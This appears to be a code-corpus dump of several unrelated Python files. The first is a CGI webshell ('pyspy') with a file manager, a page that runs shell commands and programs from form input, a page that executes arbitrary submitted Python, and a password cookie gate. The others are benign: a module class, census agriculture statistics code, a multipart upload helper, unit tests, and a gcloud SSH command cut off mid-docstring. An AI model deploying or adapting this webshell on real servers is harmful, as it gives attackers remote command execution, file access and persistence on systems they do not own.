.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 10px 5px 5px;}
.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}
.head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 10px 5px 5px;font-weight:bold;}
.head td span{font-weight:normal;}
form{margin:0;padding:0;}
h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
</style>
<script type="text/javascript">
function CheckAll(form) {
for(var i=0;i<form.elements.length;i++) {
var e = form.elements[i];
if (e.name != 'chkall')
e.checked = form.chkall.checked;
}
}
function $(id) {
return document.getElementById(id);
}
function goaction(act){
$('goaction').action.value=act;
$('goaction').submit();
}
</script>
</head>
<body style="margin:0;table-layout:fixed; word-break:break-all">
<table width="100%%" border="0" cellpadding="0" cellspacing="0">
<tr class="head">
<td><span style="float:right;"><a href="http://blog.csdn.net/yueguanghaidao" target="_blank"> Author: SkyCrab</a></span>%s(%s)
</td>
</tr>
<tr class="alt1">
<td>
<a href="javascript:goaction('file');">File Manager</a> |
<a href="javascript:goaction('shell');">Execute Command</a> |
<a href="javascript:goaction('env');">System Variable</a> |
<a href="javascript:goaction('eval');">Eval Python Code</a>
</td>
</tr>
</table>
<form name="goaction" id="goaction" action="" method="post" >
<input id="action" type="hidden" name="action" value="" />
</form>
""" % (addr, host)
    print(html)
    handler()
def getPerms(path):
    """Return ``(octal_digits, ls_style_mode)`` for *path*.

    ``octal_digits`` is the last four octal digits of the stat mode
    (e.g. ``'0644'``); ``ls_style_mode`` is a 10-character string in
    ``ls -l`` style, e.g. ``'-rw-r--r--'``.

    Fix vs. the original: the legacy ``00400``-style octal literals are
    a syntax error on Python 3; the ``stat.S_I*`` constants are used
    instead and are valid on both Python 2 and 3.
    """
    mode = os.stat(path)[stat.ST_MODE]
    perm = oct(mode)[-4:]
    # File-type character, same table as ls(1).  Note os.stat() follows
    # symlinks, so the 'l' branch only triggers for broken stat modes.
    if stat.S_ISDIR(mode):
        ftype = 'd'
    elif stat.S_ISLNK(mode):
        ftype = 'l'
    elif stat.S_ISCHR(mode):
        ftype = 'c'
    elif stat.S_ISBLK(mode):
        ftype = 'b'
    elif stat.S_ISREG(mode):
        ftype = '-'
    elif stat.S_ISFIFO(mode):
        ftype = 'p'
    elif stat.S_ISSOCK(mode):
        ftype = 's'
    else:
        ftype = '?'
    # Build the rwx triplets for user, group and other in order.
    bits = ''
    for mask, ch in ((stat.S_IRUSR, 'r'), (stat.S_IWUSR, 'w'), (stat.S_IXUSR, 'x'),
                     (stat.S_IRGRP, 'r'), (stat.S_IWGRP, 'w'), (stat.S_IXGRP, 'x'),
                     (stat.S_IROTH, 'r'), (stat.S_IWOTH, 'w'), (stat.S_IXOTH, 'x')):
        bits += ch if (mode & mask) else '-'
    return perm, ftype + bits
def do_file():
    # File Manager page.  Emits: hidden helper forms (submitted by the
    # JS helpers), the directory navigation bar, the action bar, and a
    # table listing the current directory.  All output is printed
    # directly to the CGI response (Python 2 ``print``).
    current_dir = getvalue("dir") or os.getcwd()
    parent_dir = os.path.dirname(current_dir)
    perm,mode = getPerms(current_dir)
    # Hidden forms used by createdir()/fileperm()/copyfile()/rename()/
    # opfile() below; each carries the current dir so the next request
    # lands back in the same directory.
    forms = """
<form name="createdir" id="createdir" action="" method="post" >
<input id="newdirname" type="hidden" name="newdirname" value="" />
<input id="dir" type="hidden" name="dir" value="%s" />
</form>
<form name="fileperm" id="fileperm" action="" method="post" >
<input id="newperm" type="hidden" name="newperm" value="" />
<input id="pfile" type="hidden" name="pfile" value="" />
<input id="dir" type="hidden" name="dir" value="%s" />
</form>
<form name="copyfile" id="copyfile" action="" method="post" >
<input id="sname" type="hidden" name="sname" value="" />
<input id="tofile" type="hidden" name="tofile" value="" />
<input id="dir" type="hidden" name="dir" value="%s" />
</form>
<form name="rename" id="rename" action="" method="post" >
<input id="oldname" type="hidden" name="oldname" value="" />
<input id="newfilename" type="hidden" name="newfilename" value="" />
<input id="dir" type="hidden" name="dir" value="%s" />
</form>
<form name="fileopform" id="fileopform" action="" method="post" >
<input id="action" type="hidden" name="action" value="" />
<input id="opfile" type="hidden" name="opfile" value="" />
<input id="dir" type="hidden" name="dir" value="" />
</form>
""" % tuple((current_dir+'/' for x in range(4)))
    # Navigation bar plus the JS helpers that drive the hidden forms.
    godir="""
<table width="100%%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
<form action="" method="post" id="godir" name="godir">
<tr>
<td nowrap>Current Directory (%s, %s)</td>
<td width="100%%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="%s" type="text" style="width:100%%;margin:0 8px;"></td>
<td nowrap><input class="bt" value="GO" type="submit"></td>
</tr>
</form>
</table>
<script type="text/javascript">
function createdir(){
var newdirname;
newdirname = prompt('Please input the directory name:', '');
if (!newdirname) return;
$('createdir').newdirname.value=newdirname;
$('createdir').submit();
}
function fileperm(pfile){
var newperm;
newperm = prompt('Current file:'+pfile+'Please input new attribute:', '');
if (!newperm) return;
$('fileperm').newperm.value=newperm;
$('fileperm').pfile.value=pfile;
$('fileperm').submit();
}
function copyfile(sname){
var tofile;
tofile = prompt('Original file:'+sname+'Please input object file (fullpath):', '');
if (!tofile) return;
$('copyfile').tofile.value=tofile;
$('copyfile').sname.value=sname;
$('copyfile').submit();
}
function rename(oldname){
var newfilename;
newfilename = prompt('Former file name:'+oldname+'Please input new filename:', '');
if (!newfilename) return;
$('rename').newfilename.value=newfilename;
$('rename').oldname.value=oldname;
$('rename').submit();
}
function dofile(doing,thefile,m){
if (m && !confirm(m)) {
return;
}
$('filelist').doing.value=doing;
if (thefile){
$('filelist').thefile.value=thefile;
}
$('filelist').submit();
}
function createfile(nowpath){
var filename;
filename = prompt('Please input the file name:', '');
if (!filename) return;
opfile('editfile',nowpath + filename,nowpath);
}
function opfile(action,opfile,dir){
$('fileopform').action.value=action;
$('fileopform').opfile.value=opfile;
$('fileopform').dir.value=dir;
$('fileopform').submit();
}
function godir(dir,view_writable){
if (view_writable) {
$('godir').view_writable.value=1;
}
$('godir').dir.value=dir;
$('godir').submit();
}
</script>
""" % (perm,mode,current_dir)
    # Action/upload bar.  NOTE(review): ``self`` here is presumably a
    # module-level variable holding this script's own URL (defined
    # outside this chunk) — verify; it is not a method receiver.
    manage = """
<table width="100%%" border="0" cellpadding="4" cellspacing="0">
<form action="%s" method="POST" enctype="multipart/form-data"><tr class="alt1"><td colspan="7" style="padding:5px;">
<div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="bt" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="./" type="hidden" /><input name="dir" value="./" type="hidden" /></div>
<a href="javascript:createdir();">Create Directory</a> |
<a href="javascript:createfile('%s');">Create File</a>
</td></tr></form>
<tr class="head"><td> </td><td>Filename</td><td width="16%%">Last modified</td><td width="10%%">Size</td><td width="20%%">Chmod / Perms</td><td width="22%%">Action</td></tr>
<tr class=alt1>
<td align="center"><font face="Wingdings 3" size=4>=</font></td><td nowrap colspan="5"><a href="javascript:godir('%s');">Parent Directory</a></td>
</tr>
<tr bgcolor="#dddddd" stlye="border-top:1px solid #fff;border-bottom:1px solid #ddd;"><td colspan="6" height="5"></td></tr>
""" % (self,current_dir,parent_dir)
    # Per-row action link templates (filled in by getlist()).
    dir_action = """
<a href="javascript:dofile('deldir','%s','Are you sure will delete test? \n\nIf non-empty directory, will be delete all the files.')">Del
</a>|
<a href="javascript:rename('%s');">Rename</a>
"""
    file_action = """
<a href="javascript:dofile('downfile','%s');">Down</a> |
<a href="javascript:copyfile('%s');">Copy</a> |
<a href="javascript:opfile('editfile','%s','%s');">Edit</a> |
<a href="javascript:rename('%s');">Rename</a> |
<a href="javascript:opfile('newtime','%s','%s');">Time</a>
"""
    # Row template: class, hover-restore class, name, mtime, size,
    # chmod target + octal perm, chmod target + rwx string, actions.
    lists = """
<tr class="%s" onmouseover="this.className='focus';" onmouseout="this.className='%s';">
<td> </td>
<td><a href="#" target="#">%s</a></td>
<td nowrap>%s</td>
<td nowrap>%s</td>
<td nowrap>
<a href="javascript:fileperm('%s');">%s</a> /
<a href="javascript:fileperm('%s');">%s</a>
</td>
<td nowrap>
%s
</td></tr>
"""
    print forms+godir+manage
    def getlist():
        # Closure over dir_action/file_action/lists above.  Builds the
        # table rows: directories first, then files, each sorted.
        # bg() (defined earlier in the file) alternates the row class.
        files = []
        dirs = []
        result = ""
        dirlists = os.listdir(os.getcwd())
        dirlists.sort()
        for f in dirlists:
            abspath = "%s%s%s" %(os.getcwd(),os.sep,f)
            dirs.append(abspath) if os.path.isdir(abspath) else files.append(abspath)
        for f in itertools.chain(dirs,files):
            fstat = os.stat(f)
            modified = time.strftime("%Y-%m-%d %H:%M:%S",time.localtime(fstat[stat.ST_MTIME]))
            mode , perm = getPerms(f)
            if os.path.isfile(f):
                size = fstat[stat.ST_SIZE]
                action = file_action % tuple([f for x in range(3)]+[os.path.dirname(f)]+[f for x in range(2)]+[os.path.dirname(f)])
            else:
                size = '-'
                action = dir_action %(f,f)
            res = lists % (bg(),bg(),f,modified,size,f,mode,f,perm,action)
            result += res
        return result
    print getlist()
def do_shell():
    # 'Execute Command' page.  SECURITY: this deliberately feeds
    # user-supplied input to a shell (shell=True) and to os.execve —
    # it is a webshell; command injection is the feature, not a bug.
    log = "/c net start > %s%slog.txt" %(os.getcwd(),os.sep)
    # Platform-specific defaults shown in the form fields.
    if sys.platform == "win32":
        path ,args ,com = "c:\windows\system32\cmd.exe" ,log ,"ipconfig"
    elif sys.platform == "linux2":
        path ,args ,com = "/bin/bash" ,"--help" ,"ifconfig"
    else:
        path ,args ,com = "" ,"" ,""
    shell_cmd = getvalue("command").strip()
    shell_pro = getvalue("program").strip()
    is_cmd = True if shell_cmd !="" else False
    is_pro = True if shell_pro !="" else False
    program = shell_pro or path
    parameter = getvalue("parameter").strip() or args
    command = shell_cmd or com
    result = ""
    if is_cmd:
        # stderr is folded into stdout so errors show up in the page.
        p = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
        result = "".join(p.stdout.readlines())
    shell = """
<table width="100%%" border="0" cellpadding="15" cellspacing="0"><tr><td>
<form name="form1" id="form1" action="" method="post" >
<h2>Execute Program »</h2>
<input id="action" type="hidden" name="action" value="shell" />
<p>Program<br /><input class="input" name="program" id="program" value="%s" type="text" size="100" /></p>
<p>
Parameter<br /><input class="input" name="parameter" id="parameter" value="%s" type="text" size="100" />
<input class="bt" name="submit" id="submit" value="Execute" type="submit" size="100" />
</p>
</form>
<form name="form1" id="form1" action="" method="post" >
<h2>Execute Command »</h2>
<input id="action" type="hidden" name="action" value="shell" />
<p>Command<br /><input class="input" name="command" id="command" value="%s" type="text" size="100" />
<input class="bt" name="submit" id="submit" value="Execute" type="submit" size="100" /></p>
</form>
<pre> %s </pre>
</td></tr>
</table>
""" % (program,parameter,command,result)
    print shell
    if is_pro:
        # Replaces the current CGI process with the requested program.
        os.execve(program, parameter.split(), os.environ)
def do_env():
def os():
if sys.platform.startswith('l'):
return "Linux"
elif sys.platform.startswith('w'):
return "Windows"
elif sys.platform.startswith('d'):
return "Mac"
elif sys.platform.startswith('o'):
return "OS"
else:
return "Unknown"
server ={}
python ={}
server['Server Time'] = time.strftime("%Y-%m-%d %H:%M:%S",time.localtime())
server['Server Domain'] = getvalue("SERVER_NAME")
server['Server IP'] = socket.gethostbyname(server['Server Domain']) or "Unknown"
server['Server OS'] = os()
server['Server Software'] = getvalue("SERVER_SOFTWARE") or "Unknown"
server['Cgi Path'] = getvalue("PATH_INFO") or "Unknown"
serverInfo = ""
pythonInfo = ""
for k ,v in server.items():
serverInfo += "<li><u>%s:</u> %s</li>" % (k, v)
for k ,v in python.items():
pythonInfo += "<li><u>%s:</u> %s</li>" % (k, v)
env = """
<table width="100%%" border="0" cellpadding="15" cellspacing="0"><tr><td>
<h2>Server »</h2>
<ul class="info">
%s
</ul>
<h2>Python »</h2>
<ul class="info">
%s
<h2>waitting for you to add!!!</h2>
</ul>
</tr></td>
</table>
""" %(serverInfo,pythonInfo)
print env
def do_eval():
    # 'Eval Python Code' page.  SECURITY: runs arbitrary user-supplied
    # Python via execfile() — intentional for a webshell.
    code = getvalue("pythoncode")
    # Write the submitted code to a scratch file so execfile can run it.
    tmp = open("temp.py","w")
    tmp.write(code)
    tmp.close()
    # Capture anything the code prints by swapping sys.stdout.
    # (Shadows the ``file`` builtin — kept as-is for byte-compatibility.)
    file=StringIO.StringIO()
    if code != "":
        stdout=sys.stdout
        sys.stdout=file
        try:
            execfile("temp.py")
        except Exception,e:
            # Surface the exception text in the captured output.
            file.write(str(e))
        sys.stdout=stdout
        os.remove("temp.py")
    eval = """
<table width="100%%" border="0" cellpadding="15" cellspacing="0"><tr><td>
<form name="form1" id="form1" action="" method="post" >
<h1> <pre>%s</pre> </h1>
<h2>Eval Python Code »</h2>
<input id="action" type="hidden" name="action" value="eval" />
<p>Python Code<br /><textarea class="area" id="phpcode" name="pythoncode" cols="100" rows="15" >%s</textarea></p>
<p><input class="bt" name="submit" id="submit" type="submit" value="Submit"></p>
</form>
</td></tr></table>
""" % (file.getvalue(),code)
    print eval
def login():
    # Entry point: cookie-based auth gate in front of index().
    # ``admin`` is a module-level config dict (defined outside this
    # chunk) with at least 'check' and 'pass' keys.
    if admin["check"]:
        if getvalue("doing") == "login":
            if admin["pass"] == getvalue("password"):
                # Correct password: set the auth cookie, then serve the page.
                print "Set-Cookie:Pyspypass=%s" % admin["pass"]
                #print "Set-Cookie:Expires=Tuesday, 31-Dec-2014 23:12:40 GMT"
                print "Content-type:text/html"
                print
                index()
                return
        # Not a login POST (or wrong password): require a valid cookie.
        if getcookie('Pyspypass') != admin['pass']:
            print "Content-type:text/html"
            print
            loginpage()
        else:
            print "Content-type:text/html"
            print
            index()
    # NOTE(review): indentation was reconstructed — when admin["check"]
    # is false no branch emits a response here; confirm against the
    # original file whether an else serving index() was intended.
if __name__ == '__main__':
    login()
|
xl7dev/WebShell
|
python/pyspy.py
|
Python
|
gpl-2.0
| 18,487
|
from wtypes.scope import WScope
from wtypes.string import WString
class WModule(WScope):
    """A scope representing a loaded module.

    Registers itself under '__module__' and records the module name,
    file name and builtins module (when given) under the conventional
    dunder keys, coercing plain str values to WString.
    """

    # Module name as a WString, or None for anonymous modules.
    name = None

    def __init__(self, builtins_module=None, name=None, filename=None):
        super().__init__(builtins_module=builtins_module)
        self['__module__'] = self
        if name:
            if isinstance(name, str):
                name = WString(name)
            self['__name__'] = name
            self.name = name
        if filename:
            if isinstance(filename, str):
                filename = WString(filename)
            self['__file__'] = filename
        if builtins_module is not None:
            self['__builtins__'] = builtins_module

    def __str__(self):
        if self.name:
            return f'WModule("{self.name}", {len(self)} keys)'
        # Fixed: the anonymous form previously emitted an unbalanced
        # quote — 'WModule("N keys)' — with no closing '"'.
        return f'WModule({len(self)} keys)'
|
izrik/wodehouse
|
wtypes/module.py
|
Python
|
gpl-2.0
| 822
|
from collections import OrderedDict
from wazimap.data.utils import get_stat_data
# Recode maps: translate raw census category codes into human-readable
# labels for get_stat_data().  OrderedDict preserves the intended
# display order of each category set.
MEAT_RECODES = OrderedDict([
    ('BUFF', 'Water Buffalo'),
    ('CHEVON', 'Goat'),
    ('CHICKEN', 'Chicken'),
    ('DUCK', 'Duck'),
    ('MUTTON', 'Mutton'),
    ('PORK', 'Pork')
])
LIVESTOCK_RECODES = OrderedDict([
    ('BUFFALOES', 'Water Buffalo'),
    ('CATTLE', 'Cattle'),
    ('DUCKS', 'Ducks'),
    ('FOWL', 'Fowl'),
    ('GOATS', 'Goats'),
    ('PIGS', 'Pigs'),
    ('SHEEP', 'Sheep')
])
MILK_ANIMAL_RECODES = OrderedDict([
    ('BUFFALOES', 'Water Buffaloes'),
    ('COWS', 'Cows')
])
MILK_RECODES = OrderedDict([
    ('BUFFALO_MILK', 'Water Buffalo Milk'),
    ('COW_MILK', 'Cow Milk')
])
EGG_RECODES = OrderedDict([
    ('HEN_EGGS', 'Hen Eggs'),
    ('DUCK_EGGS', 'Duck Eggs')
])
EGG_LAYER_RECODES = OrderedDict([
    ('HENS', 'Hens'),
    ('DUCKS', 'Ducks')
])
def get_agriculture_profile(geo_code, geo_level, session):
    """Build the agriculture section of a geography's profile.

    Args:
        geo_code: geography code to query.
        geo_level: geography level; 'vdc' has no agriculture data.
        session: database session passed through to get_stat_data().

    Returns:
        ``{'area_has_data': False}`` for VDC-level geographies;
        otherwise a dict with a distribution and a total entry for each
        of: meat, livestock, milk animals, milk, eggs and egg layers.

    Refactor vs. the original: the six near-identical get_stat_data()
    call/stanza pairs are driven from one spec table.
    """
    if geo_level == 'vdc':
        return {'area_has_data': False}

    # (db field, recode map, distribution key, total key, total label)
    stat_specs = [
        ('meat type', MEAT_RECODES,
         'meat_distribution', 'total_meat', 'Metric tons of meat produced'),
        ('livestock type', LIVESTOCK_RECODES,
         'livestock_distribution', 'total_livestock', 'Number of livestock'),
        ('milk animal type', MILK_ANIMAL_RECODES,
         'milk_animal_distribution', 'total_milk_animals',
         'Number of milk animals'),
        ('milk type', MILK_RECODES,
         'milk_distribution', 'total_milk', 'Metric tons of milk'),
        ('egg type', EGG_RECODES,
         'egg_distribution', 'total_eggs', 'Number of eggs'),
        ('egg layer type', EGG_LAYER_RECODES,
         'egg_layer_distribution', 'total_egg_layers',
         'Number of laying hens and ducks'),
    ]

    agriculture_data = {'is_vdc': False, 'area_has_data': True}
    for field, recodes, dist_key, total_key, total_name in stat_specs:
        dist, total = get_stat_data(
            field, geo_level, geo_code, session,
            recode=dict(recodes),
            percent=False,
            order_by='-total')
        agriculture_data[dist_key] = dist
        agriculture_data[total_key] = {
            'name': total_name,
            'values': {'this': total},
        }
    return agriculture_data
|
cliftonmcintosh/nepalmap_app
|
wazimap_np/agriculture.py
|
Python
|
mit
| 3,537
|
#!/usr/bin/env python
# Snippet from http://code.activestate.com/recipes/146306/
import httplib, mimetypes
def post_multipart(host, selector, fields, files):
    """
    Post fields and files to an http host as multipart/form-data.
    fields is a sequence of (name, value) elements for regular form fields.
    files is a sequence of (name, filename, value) elements for data to be uploaded as files
    Return the server's response page.
    """
    content_type, body = encode_multipart_formdata(fields, files)
    # NOTE(review): httplib.HTTPS is the legacy Python 2 API and does
    # not verify server certificates; Python 3 code would use
    # http.client.HTTPSConnection instead.
    h = httplib.HTTPS(host)
    h.putrequest('POST', selector)
    h.putheader('content-type', content_type)
    h.putheader('content-length', str(len(body)))
    h.endheaders()
    h.send(body)
    # getreply() parses the status line; the raw body follows on h.file.
    errcode, errmsg, headers = h.getreply()
    return h.file.read()
def encode_multipart_formdata(fields, files):
    """
    Build a multipart/form-data request body.

    fields is a sequence of (name, value) pairs for regular form fields.
    files is a sequence of (name, filename, value) triples for uploads.
    Returns (content_type, body) ready for an httplib.HTTP instance.
    """
    boundary = '----------ThIs_Is_tHe_bouNdaRY_$'
    crlf = '\r\n'
    parts = []
    for name, value in fields:
        parts.extend([
            '--' + boundary,
            'Content-Disposition: form-data; name="%s"' % name,
            '',
            value,
        ])
    for name, filename, value in files:
        parts.extend([
            '--' + boundary,
            'Content-Disposition: form-data; name="%s"; filename="%s"' % (name, filename),
            'Content-Type: %s' % get_content_type(filename),
            '',
            value,
        ])
    # Closing boundary, then a trailing CRLF via the final empty part.
    parts.append('--' + boundary + '--')
    parts.append('')
    body = crlf.join(parts)
    content_type = 'multipart/form-data; boundary=%s' % boundary
    return content_type, body
def get_content_type(filename):
    """Guess the MIME type for *filename*; default to octet-stream."""
    guessed = mimetypes.guess_type(filename)[0]
    if guessed is None:
        return 'application/octet-stream'
    return guessed
|
kevthehermit/Maildb
|
core/vtpostfile.py
|
Python
|
gpl-3.0
| 1,896
|
# -*- coding: utf-8 -*-
#
# Copyright © 2013 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions
# of the GNU General Public License v.2, or (at your option) any later
# version. This program is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY expressed or implied, including the
# implied warranties of MERCHANTABILITY or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU General Public License for more details. You
# should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# Any Red Hat trademarks that are incorporated in the source
# code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission
# of Red Hat, Inc.
#
'''
pkgdb tests for the Collection object.
'''
__requires__ = ['SQLAlchemy >= 0.8']
import pkg_resources
import unittest
import sys
import os
sys.path.insert(0, os.path.join(os.path.dirname(
os.path.abspath(__file__)), '..'))
from pkgdb2.lib import model
from tests import Modeltests, create_collection
class Collectiontests(Modeltests):
    """ Collection tests. """

    def test_init_collection(self):
        """ Test the __init__ function of Collection. """
        create_collection(self.session)
        self.assertEqual(5, len(model.Collection.all(self.session)))

    def test_repr_collection(self):
        """ Test the __repr__ function of Collection. """
        create_collection(self.session)
        by_branch = sorted(
            model.Collection.all(self.session),
            key=lambda clt: clt.branchname)
        self.assertEqual('el4', by_branch[0].branchname)
        self.assertEqual('el6', by_branch[1].branchname)
        self.assertEqual(
            "Collection(u'Fedora', u'17', u'Active', owner:u'toshio')",
            repr(by_branch[2]))
        self.assertEqual('f18', by_branch[3].branchname)

    def test_search(self):
        """ Test the search function of Collection. """
        create_collection(self.session)

        # No EPEL collections exist in the fixture data.
        matches = model.Collection.search(self.session, 'EPEL%')
        self.assertEqual(0, len(matches))

        # Pattern plus status filter.
        matches = model.Collection.search(self.session, 'f%', 'Active')
        self.assertEqual(
            "Collection(u'Fedora', u'17', u'Active', owner:u'toshio')",
            repr(matches[0]))

        # Pattern alone, then the count-only form of the same query.
        matches = model.Collection.search(self.session, 'f%')
        self.assertEqual(2, len(matches))
        self.assertEqual(
            2, model.Collection.search(self.session, 'f%', count=True))

        # Pagination: offset and limit each reduce the result to one row.
        self.assertEqual(1, len(model.Collection.search(
            session=self.session, clt_name='f%', offset=1)))
        self.assertEqual(1, len(model.Collection.search(
            session=self.session, clt_name='f%', limit=1)))

    def test_to_json(self):
        """ Test the to_json function of Collection. """
        create_collection(self.session)
        as_json = model.Collection.by_name(self.session, 'f18').to_json()
        self.assertEqual(
            {'branchname', 'version', 'name', 'status',
             'dist_tag', 'koji_name'},
            set(as_json.keys()))
# Allow running this test module directly (python test_collection.py)
# in addition to discovery via a test runner.
if __name__ == '__main__':
    SUITE = unittest.TestLoader().loadTestsFromTestCase(Collectiontests)
    unittest.TextTestRunner(verbosity=2).run(SUITE)
|
crobinso/pkgdb2
|
tests/test_collection.py
|
Python
|
gpl-2.0
| 3,810
|
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implements the command for SSHing into an instance."""
import sys
from googlecloudsdk.api_lib.compute import gaia_utils
from googlecloudsdk.api_lib.compute import ssh_utils
from googlecloudsdk.api_lib.compute import utils
from googlecloudsdk.calliope import base
from googlecloudsdk.calliope import exceptions
def _Args(parser):
    """Argument parsing for ssh, including hook for remote completion."""
    # Common SSH CLI flags (--plain, key file handling, etc.).
    ssh_utils.BaseSSHCLICommand.Args(parser)
    parser.add_argument(
        '--command',
        help='A command to run on the virtual machine.')
    ssh_flags = parser.add_argument(
        '--ssh-flag',
        action='append',
        help='Additional flags to be passed to ssh.')
    ssh_flags.detailed_help = """\
Additional flags to be passed to *ssh(1)*. It is recommended that flags
be passed using an assignment operator and quotes. This flag will
replace occurences of ``%USER%'' and ``%INSTANCE%'' with their
dereferenced values. Example:
$ {command} example-instance --zone us-central1-a --ssh-flag="-vvv" --ssh-flag="-L 80:%INSTANCE%:80"
is equivalent to passing the flags ``--vvv'' and ``-L
80:162.222.181.197:80'' to *ssh(1)* if the external IP address of
'example-instance' is 162.222.181.197.
"""
    parser.add_argument(
        '--container',
        help="""\
The name of a container inside of the virtual machine instance to
connect to. This only applies to virtual machines that are using
a Google container virtual machine image. For more information,
see link:https://cloud.google.com/compute/docs/containers[].
""")
    # Positional [USER@]INSTANCE with remote completion against
    # compute.instances.
    user_host = parser.add_argument(
        'user_host',
        completion_resource='compute.instances',
        help='Specifies the instance to SSH into.',
        metavar='[USER@]INSTANCE')
    user_host.detailed_help = """\
Specifies the instance to SSH into.
``USER'' specifies the username with which to SSH. If omitted,
$USER from the environment is selected.
"""
    # Everything after '--' is forwarded verbatim to the ssh binary.
    implementation_args = parser.add_argument(
        'implementation_args',
        nargs='*',
        help="""\
Flags and positionals passed to the underlying ssh implementation.
""",
        metavar='-- IMPLEMENTATION-ARGS')
    implementation_args.detailed_help = """\
Flags and positionals passed to the underlying ssh implementation.
The '--' argument must be specified between gcloud specific args on
the left and IMPLEMENTATION-ARGS on the right. Example:
$ {command} example-instance --zone us-central1-a -- -vvv -L 80:%INSTANCE%:80
"""
    utils.AddZoneFlag(
        parser,
        resource_type='instance',
        operation_type='connect to')
@base.ReleaseTracks(base.ReleaseTrack.GA)
class SshGA(ssh_utils.BaseSSHCLICommand):
    """SSH into a virtual machine instance."""

    def __init__(self, *args, **kwargs):
        super(SshGA, self).__init__(*args, **kwargs)
        # GA track manages keys via instance metadata, not the
        # Compute Accounts service (see SshBeta, which flips this).
        self._use_accounts_service = False

    @staticmethod
    def Args(parser):
        _Args(parser)

    def Run(self, args):
        # Assemble and execute the ssh command line for the target VM.
        super(SshGA, self).Run(args)
        # Split the [USER@]INSTANCE positional.
        parts = args.user_host.split('@')
        if len(parts) == 1:
            if self._use_accounts_service:  # Using Account Service.
                user = gaia_utils.GetDefaultAccountName(self.http)
            else:  # Uploading keys through metadata.
                user = ssh_utils.GetDefaultSshUsername(warn_on_account_user=True)
            instance = parts[0]
        elif len(parts) == 2:
            user, instance = parts
        else:
            raise exceptions.ToolException(
                'Expected argument of the form [USER@]INSTANCE; received [{0}].'
                .format(args.user_host))
        # Resolve the instance name to its external IP address.
        instance_ref = self.CreateZonalReference(instance, args.zone)
        instance = self.GetInstance(instance_ref)
        external_ip_address = ssh_utils.GetExternalIPAddress(instance)
        ssh_args = [self.ssh_executable]
        if not args.plain:
            ssh_args.extend(self.GetDefaultFlags())
        # Allocates a tty if no command was provided and a container was
        # provided.
        if args.container and not args.command:
            ssh_args.append('-t')
        if args.ssh_flag:
            for flag in args.ssh_flag:
                # Substitute the documented %USER%/%INSTANCE% tokens.
                dereferenced_flag = (
                    flag.replace('%USER%', user)
                    .replace('%INSTANCE%', external_ip_address))
                ssh_args.append(dereferenced_flag)
        ssh_args.append(ssh_utils.UserHost(user, external_ip_address))
        if args.implementation_args:
            ssh_args.extend(args.implementation_args)
        if args.container:
            ssh_args.append('--')
            ssh_args.append('container_exec')
            ssh_args.append(args.container)
            # Runs the given command inside the given container if --command was
            # specified, otherwise runs /bin/sh.
            if args.command:
                ssh_args.append(args.command)
            else:
                ssh_args.append('/bin/sh')
        elif args.command:
            ssh_args.append('--')
            ssh_args.append(args.command)
        # Don't use strict error checking for ssh: if the executed command fails,
        # we don't want to consider it an error. We do, however, want to propagate
        # its return code.
        return_code = self.ActuallyRun(
            args, ssh_args, user, instance, strict_error_checking=False,
            use_account_service=self._use_accounts_service)
        if return_code:
            # Can't raise an exception because we don't want any "ERROR" message
            # printed; the output from `ssh` will be enough.
            sys.exit(return_code)
@base.ReleaseTracks(base.ReleaseTrack.ALPHA, base.ReleaseTrack.BETA)
class SshBeta(SshGA):
    """SSH into a virtual machine instance."""

    def __init__(self, *args, **kwargs):
        super(SshBeta, self).__init__(*args, **kwargs)
        # Beta/alpha tracks resolve the SSH user and keys through the
        # Compute Accounts service instead of instance metadata.
        self._use_accounts_service = True

    @staticmethod
    def Args(parser):
        _Args(parser)
def DetailedHelp(version):
    """Construct help text based on the command release track.

    Args:
      version: str, 'GA' or 'BETA'; selects the DESCRIPTION wording.

    Returns:
      A dict with 'brief', 'DESCRIPTION' and 'EXAMPLES' keys suitable for
      assignment to a command class's ``detailed_help`` attribute.
    """
    detailed_help = {
        'brief': 'SSH into a virtual machine instance',
        'DESCRIPTION': """\
*{command}* is a thin wrapper around the *ssh(1)* command that
takes care of authentication and the translation of the
instance name into an IP address.
This command ensures that the user's public SSH key is present
in the project's metadata. If the user does not have a public
SSH key, one is generated using *ssh-keygen(1)* (if the `--quiet`
flag is given, the generated key will have an empty passphrase).
""",
        'EXAMPLES': """\
To SSH into 'example-instance' in zone ``us-central1-a'', run:
$ {command} example-instance --zone us-central1-a
You can also run a command on the virtual machine. For
example, to get a snapshot of the guest's process tree, run:
$ {command} example-instance --zone us-central1-a --command "ps -ejH"
If you are using the Google container virtual machine image, you
can SSH into one of your containers with:
$ {command} example-instance --zone us-central1-a --container CONTAINER
""",
    }
    if version == 'BETA':
        # Typo fixes vs. the original text: 'availibe' -> 'available',
        # "`the --quiet`" -> "the `--quiet`".
        detailed_help['DESCRIPTION'] = """\
*{command}* is a thin wrapper around the *ssh(1)* command that
takes care of authentication and the translation of the
instance name into an IP address.
This command uses the Compute Accounts API to ensure that the user's
public SSH key is available to the VM. This form of key management
